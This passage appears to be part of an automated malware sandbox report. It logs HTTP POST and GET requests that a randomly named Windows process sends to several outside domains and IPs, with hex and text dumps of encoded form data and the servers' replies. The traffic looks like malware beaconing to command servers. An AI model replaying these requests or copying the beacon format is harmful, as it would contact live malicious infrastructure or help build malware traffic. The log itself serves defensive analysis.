                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.849725101.32.205.61805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:34.255475044 CET728OUTPOST /gtil/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.rwse6wjx.sbs
                                                                              Origin: http://www.rwse6wjx.sbs
                                                                              Referer: http://www.rwse6wjx.sbs/gtil/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 62 48 37 6d 30 31 74 36 36 6b 77 6e 59 50 59 46 33 48 39 6c 37 61 35 72 5a 76 47 6c 68 36 2f 6a 54 69 70 4d 47 78 35 6f 6a 7a 52 74 54 49 5a 53 49 37 31 45 58 4b 75 67 30 46 51 42 52 73 64 57 57 6a 74 67 67 67 65 6b 30 77 79 72 73 75 59 57 2f 48 39 47 56 52 6a 79 61 69 2b 77 45 51 6f 61 70 46 46 4d 2b 62 6d 6d 38 6b 53 49 61 6a 61 6a 67 56 50 30 30 79 7a 50 56 52 6f 35 4c 6d 4a 76 52 76 58 30 63 6b 64 2b 48 5a 44 41 68 55 54 77 66 48 73 64 69 6a 69 72 35 36 77 59 6a 73 52 41 59 58 50 36 62 39 50 4b 31 4c 32 30 2f 6f 58 64 6f 4b 73 61 73 5a 33 43 54 6f 3d
                                                                              Data Ascii: irCxl6=/wBbw28ri3wrEbH7m01t66kwnYPYF3H9l7a5rZvGlh6/jTipMGx5ojzRtTIZSI71EXKug0FQBRsdWWjtgggek0wyrsuYW/H9GVRjyai+wEQoapFFM+bmm8kSIajajgVP00yzPVRo5LmJvRvX0ckd+HZDAhUTwfHsdijir56wYjsRAYXP6b9PK1L20/oXdoKsasZ3CTo=
                                                                              Jan 10, 2025 18:55:35.243802071 CET306INHTTP/1.1 404 Not Found
                                                                              Server: Tengine
                                                                              Date: Fri, 10 Jan 2025 17:55:35 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.849726101.32.205.61805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:36.808756113 CET748OUTPOST /gtil/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.rwse6wjx.sbs
                                                                              Origin: http://www.rwse6wjx.sbs
                                                                              Referer: http://www.rwse6wjx.sbs/gtil/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 37 33 37 67 58 64 74 7a 36 6b 76 6f 34 50 59 50 58 48 35 6c 37 47 35 72 59 72 6f 6c 54 65 2f 6a 79 53 70 50 46 70 35 70 6a 7a 52 31 44 49 63 64 6f 37 38 45 58 33 54 67 31 70 51 42 52 34 64 57 55 37 74 67 54 49 5a 2b 45 77 30 6d 4d 75 65 62 66 48 39 47 56 52 6a 79 61 48 5a 77 48 67 6f 61 59 31 46 4e 62 6e 6c 76 63 6b 52 50 61 6a 61 31 51 56 4c 30 30 79 72 50 55 64 47 35 4a 75 4a 76 51 66 58 30 4e 6b 65 30 48 5a 46 4e 42 56 34 32 2b 6d 49 58 43 43 4e 75 61 69 51 61 31 67 6f 4d 4f 6d 6c 67 35 31 4a 4a 31 6a 64 30 38 41 68 59 66 58 45 41 50 4a 48 63 45 2b 68 6d 52 4d 78 58 41 78 66 4f 50 71 6b 4a 30 45 67 54 6d 33 2b
                                                                              Data Ascii: irCxl6=/wBbw28ri3wrE737gXdtz6kvo4PYPXH5l7G5rYrolTe/jySpPFp5pjzR1DIcdo78EX3Tg1pQBR4dWU7tgTIZ+Ew0mMuebfH9GVRjyaHZwHgoaY1FNbnlvckRPaja1QVL00yrPUdG5JuJvQfX0Nke0HZFNBV42+mIXCCNuaiQa1goMOmlg51JJ1jd08AhYfXEAPJHcE+hmRMxXAxfOPqkJ0EgTm3+
                                                                              Jan 10, 2025 18:55:37.683824062 CET306INHTTP/1.1 404 Not Found
                                                                              Server: Tengine
                                                                              Date: Fri, 10 Jan 2025 17:55:37 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.849727101.32.205.61805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:39.352354050 CET1765OUTPOST /gtil/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.rwse6wjx.sbs
                                                                              Origin: http://www.rwse6wjx.sbs
                                                                              Referer: http://www.rwse6wjx.sbs/gtil/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2f 77 42 62 77 32 38 72 69 33 77 72 45 37 33 37 67 58 64 74 7a 36 6b 76 6f 34 50 59 50 58 48 35 6c 37 47 35 72 59 72 6f 6c 54 57 2f 69 41 61 70 50 6b 70 35 76 54 7a 52 38 6a 49 64 64 6f 36 38 45 54 6a 58 67 31 56 75 42 54 41 64 58 31 62 74 33 53 49 5a 72 55 77 30 76 73 75 66 57 2f 47 39 47 56 42 6e 79 61 58 5a 77 48 67 6f 61 61 74 46 62 2b 62 6c 70 63 6b 53 49 61 6a 47 6a 67 56 7a 30 31 61 37 50 55 4a 34 34 34 4f 4a 76 77 50 58 31 2f 4d 65 70 33 5a 48 4f 42 56 67 32 2b 71 58 58 43 66 32 75 5a 2b 32 61 79 73 6f 4f 6f 4b 2b 31 62 78 4a 52 57 2f 66 36 73 41 46 55 74 48 39 4a 65 4e 73 66 47 71 73 67 55 6b 44 59 43 6c 72 43 75 37 55 57 52 4d 4a 59 77 4b 4c 47 6a 50 79 6b 52 77 53 6e 44 34 41 42 75 67 68 5a 41 6f 77 74 63 36 46 4d 2b 51 4c 45 35 68 39 42 4a 4e 4b 35 4a 52 59 32 75 7a 42 58 7a 74 67 6a 54 39 6d 46 76 68 48 54 48 6c 62 6b 4f 48 6b 73 31 46 51 58 4b 57 4d 6f 78 66 71 2f 74 2f 33 75 4d 49 49 38 5a 39 74 62 45 48 74 63 38 44 79 46 50 54 7a 47 49 56 6d 6f 52 74 67 6c 53 6d [TRUNCATED]
                                                                              Data Ascii: irCxl6=/wBbw28ri3wrE737gXdtz6kvo4PYPXH5l7G5rYrolTW/iAapPkp5vTzR8jIddo68ETjXg1VuBTAdX1bt3SIZrUw0vsufW/G9GVBnyaXZwHgoaatFb+blpckSIajGjgVz01a7PUJ444OJvwPX1/Mep3ZHOBVg2+qXXCf2uZ+2aysoOoK+1bxJRW/f6sAFUtH9JeNsfGqsgUkDYClrCu7UWRMJYwKLGjPykRwSnD4ABughZAowtc6FM+QLE5h9BJNK5JRY2uzBXztgjT9mFvhHTHlbkOHks1FQXKWMoxfq/t/3uMII8Z9tbEHtc8DyFPTzGIVmoRtglSmNuGF70NJVCgJ9LYbNF7T5Umm2mjPGpeQ/TXQuQzwNINMRQfUkZOMkDpg8+uomzH51I7XD4MGi2hPHG4IOihkQ8FcKQYEaEN+eBh6Ss/bakbaL5AKELuPgQdtapJYFcGC9z+lX6hzqqPBWDWKk4alA1ptHofysAQlHM2dmikHfY4l7O/AsSDDH+ibLA6xtY+EmpgHtS2qFvNksgtZ1IxSshpB9TBf+gkzQASnYwh7IOrUQF9QhUOcW0uVG/0W/YoEZAdqO0QFNYzt6Yi/YXo8Uzw2Ivn+gGRo7x9cXB3GBaLs745NVU1kyMG5rX3hQs2SVJpI4W7FfhyRYcTyGoTz3JgQFhE3TaZ+VSdt1vNCPCpeXLU9/XEJVscfj9n/dPwdTD2USvxuqyAg/RTvXOlXHt2INKpnSezke5ETTp6AO+443+7T8EwVdvcQ7t4vCc9/pV6QML6KEg4KPRr8LZrqbr0JnY1vMRTbjzVBDVEEcZ2iuBRp8F8t4SHRCs8wqo5jMJVYMoS+AzG6uOkMQfHfXOy6Gidin4Hm6nb0n3JTMSCYXCPny4tkmQowhz4v4QTbwB6cnaw2WnxhlehkSrlTfaQEWZOnnAyj9bbi5dEavb9XeyucfFvb5/8o0EEGet+SNRy/3xu6SEobFh3KwjwYuGJ5Yd1NHZYL7s [TRUNCATED]
                                                                              Jan 10, 2025 18:55:40.303808928 CET306INHTTP/1.1 404 Not Found
                                                                              Server: Tengine
                                                                              Date: Fri, 10 Jan 2025 17:55:40 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.849728101.32.205.61805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:41.909040928 CET468OUTGET /gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ== HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.rwse6wjx.sbs
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:55:42.895385027 CET306INHTTP/1.1 404 Not Found
                                                                              Server: Tengine
                                                                              Date: Fri, 10 Jan 2025 17:55:42 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.849729103.159.36.66805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:48.595082045 CET746OUTPOST /nfd2/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.rokeyfashion.store
                                                                              Origin: http://www.rokeyfashion.store
                                                                              Referer: http://www.rokeyfashion.store/nfd2/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 41 78 51 79 53 73 53 59 66 4f 44 57 70 71 4c 53 44 6c 51 4d 64 36 72 74 52 77 74 7a 53 68 58 69 33 2f 68 73 65 5a 7a 2b 7a 6d 47 2b 6d 55 4e 53 43 4d 4f 64 70 72 4e 49 74 79 4e 6c 63 59 4c 78 65 4c 56 6d 53 65 44 39 45 6d 35 6c 57 43 36 56 72 6e 6c 5a 66 71 63 55 69 35 67 48 4e 50 44 58 6a 50 70 4d 79 43 6c 68 67 42 76 35 4e 38 33 6c 43 50 63 62 45 45 6f 31 75 50 71 72 77 6d 4b 6b 6f 77 76 32 70 51 32 2f 6d 68 41 7a 48 72 6d 53 39 43 35 46 74 54 46 4b 31 33 67 31 2b 54 47 66 53 43 36 78 73 6c 4b 59 67 39 56 64 4e 75 34 59 41 31 62 76 46 5a 41 46 48 58 62 77 31 6a 4b 66 68 48 37 51 38 76 6b 3d
                                                                              Data Ascii: irCxl6=AxQySsSYfODWpqLSDlQMd6rtRwtzShXi3/hseZz+zmG+mUNSCMOdprNItyNlcYLxeLVmSeD9Em5lWC6VrnlZfqcUi5gHNPDXjPpMyClhgBv5N83lCPcbEEo1uPqrwmKkowv2pQ2/mhAzHrmS9C5FtTFK13g1+TGfSC6xslKYg9VdNu4YA1bvFZAFHXbw1jKfhH7Q8vk=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.849730103.159.36.66805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:51.151169062 CET766OUTPOST /nfd2/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.rokeyfashion.store
                                                                              Origin: http://www.rokeyfashion.store
                                                                              Referer: http://www.rokeyfashion.store/nfd2/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 41 78 51 79 53 73 53 59 66 4f 44 57 76 35 6a 53 50 6b 51 4d 56 36 72 73 56 41 74 7a 59 42 58 6d 33 2f 74 73 65 62 66 75 77 56 75 2b 6d 32 56 53 42 4e 4f 64 75 72 4e 49 35 43 4d 76 52 34 4c 41 65 4c 70 55 53 65 50 39 45 6d 64 6c 57 48 65 56 72 77 35 61 65 36 63 57 71 5a 67 42 56 76 44 58 6a 50 70 4d 79 43 68 48 67 42 58 35 4e 4d 6e 6c 42 75 63 55 61 55 6f 79 6e 76 71 72 39 47 4b 67 6f 77 75 54 70 55 76 6b 6d 6e 45 7a 48 75 61 53 38 54 35 61 34 44 46 4d 6f 6e 68 45 37 68 62 7a 55 69 2f 57 78 44 43 55 67 64 4a 68 49 59 4a 79 61 58 54 70 47 5a 6f 75 48 55 7a 47 77 55 58 33 37 6b 72 67 69 34 7a 35 57 34 68 67 59 36 41 78 63 61 7a 2f 53 4d 31 6a 63 42 6d 2b
                                                                              Data Ascii: irCxl6=AxQySsSYfODWv5jSPkQMV6rsVAtzYBXm3/tsebfuwVu+m2VSBNOdurNI5CMvR4LAeLpUSeP9EmdlWHeVrw5ae6cWqZgBVvDXjPpMyChHgBX5NMnlBucUaUoynvqr9GKgowuTpUvkmnEzHuaS8T5a4DFMonhE7hbzUi/WxDCUgdJhIYJyaXTpGZouHUzGwUX37krgi4z5W4hgY6Axcaz/SM1jcBm+


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.849731103.159.36.66805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:53.696706057 CET1783OUTPOST /nfd2/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.rokeyfashion.store
                                                                              Origin: http://www.rokeyfashion.store
                                                                              Referer: http://www.rokeyfashion.store/nfd2/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 41 78 51 79 53 73 53 59 66 4f 44 57 76 35 6a 53 50 6b 51 4d 56 36 72 73 56 41 74 7a 59 42 58 6d 33 2f 74 73 65 62 66 75 77 54 32 2b 6d 48 31 53 62 75 57 64 76 72 4e 49 6c 53 4d 73 52 34 4c 6e 65 4c 78 51 53 66 79 41 45 6b 31 6c 58 6c 57 56 36 78 35 61 58 36 63 57 6f 5a 67 45 4e 50 44 43 6a 50 59 48 79 43 78 48 67 42 58 35 4e 4a 72 6c 58 50 63 55 59 55 6f 31 75 50 71 33 77 6d 4b 59 6f 77 57 70 70 55 6a 30 6d 58 6b 7a 47 4f 71 53 36 68 52 61 35 6a 46 4f 70 6e 68 63 37 68 58 73 55 69 79 74 78 44 66 37 67 66 5a 68 49 76 67 4f 64 33 75 30 46 5a 59 74 4c 6b 65 67 77 6b 72 57 2b 6c 44 4d 6f 37 4c 46 55 49 78 65 57 4a 56 77 5a 4b 37 36 48 6f 46 47 4c 30 33 43 4b 45 4b 4d 63 72 76 75 33 58 59 50 36 4e 6a 4d 34 31 33 4f 2f 4b 53 43 57 4a 46 4d 71 64 65 7a 66 61 36 56 37 4e 59 6d 65 64 6a 44 4c 35 58 79 6c 46 4e 6c 64 36 64 56 66 38 69 76 78 43 56 32 45 36 6e 34 65 70 78 37 67 4a 6d 64 57 50 53 46 42 43 48 6d 43 48 72 36 31 35 62 74 6e 61 45 62 41 61 6b 34 70 35 79 30 41 4e 7a 34 4e 68 47 [TRUNCATED]
                                                                              Data Ascii: irCxl6=AxQySsSYfODWv5jSPkQMV6rsVAtzYBXm3/tsebfuwT2+mH1SbuWdvrNIlSMsR4LneLxQSfyAEk1lXlWV6x5aX6cWoZgENPDCjPYHyCxHgBX5NJrlXPcUYUo1uPq3wmKYowWppUj0mXkzGOqS6hRa5jFOpnhc7hXsUiytxDf7gfZhIvgOd3u0FZYtLkegwkrW+lDMo7LFUIxeWJVwZK76HoFGL03CKEKMcrvu3XYP6NjM413O/KSCWJFMqdezfa6V7NYmedjDL5XylFNld6dVf8ivxCV2E6n4epx7gJmdWPSFBCHmCHr615btnaEbAak4p5y0ANz4NhGegA9stWLMXVV3r8E48lkLGt+2PoHgxDFJJQr8qi+lUGroTd46CNRzOHRPr9OmeXEl82ayCCDaWmSE9LQ9ilNF2beDGDqI0k/3IBcyHQeZQmXZ8sHRBPqeoM4UZsJV2+bxm8CQ93ggsc4PXd6nwhCxrl4ABM3AO/LxWUWU/Qxf5t6ke6TAgAb+A3/h6iJLForNezQrZ0oJu0Nvve/QO6HaRmXwi/GwUc4O4rdE18kDxKOhYbPCACzdL8nJhboA9/XxFsCFB2281aBGLjypjA3YxM7V4+qjXCUaKfHogrnlaoTe6YSLWCOeGCs8Z+/8Ex4/1LkvxASf19QTXK2R1axzAfMgAIRQWtwCtRmdiYVBbQT//UiVMvHg4mwVvDk9vFn5oKJcGSeOGhpWPb6lOywLaq/ghrAhE5UOpk3Lbx5S5oHf4rODQqyFLZiJ5vSlXjo0eiYikfzUG24X90OsKBjU5dKg0rFohA5oIlxPxfKnhqARyPj4K0PHlKAknqxDhBkUpPuWNs9xKK2ssGsxjexXgL9zJWkEJ9TjXl/jMiZHIeI+WSeWQGwoDGikGZq7O2zEJRIFmGVyg4XG12eg3oIH8d0rgOijBd3/CSxwQXnC6F8YYbBUIBeh05njH9RU4LisuCh941oKT3PB4IW+dYZs3D/m+1b53j7cZ [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.849732103.159.36.66805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:56.237102032 CET474OUTGET /nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.rokeyfashion.store
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:55:57.938616037 CET507INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                              content-type: text/html; charset=UTF-8
                                                                              x-redirect-by: WordPress
                                                                              location: http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh
                                                                              x-litespeed-cache: miss
                                                                              content-length: 0
                                                                              date: Fri, 10 Jan 2025 17:55:57 GMT
                                                                              server: LiteSpeed


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.849733103.168.172.37805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:56:03.175050974 CET734OUTPOST /up4e/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.lucelight.info
                                                                              Origin: http://www.lucelight.info
                                                                              Referer: http://www.lucelight.info/up4e/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
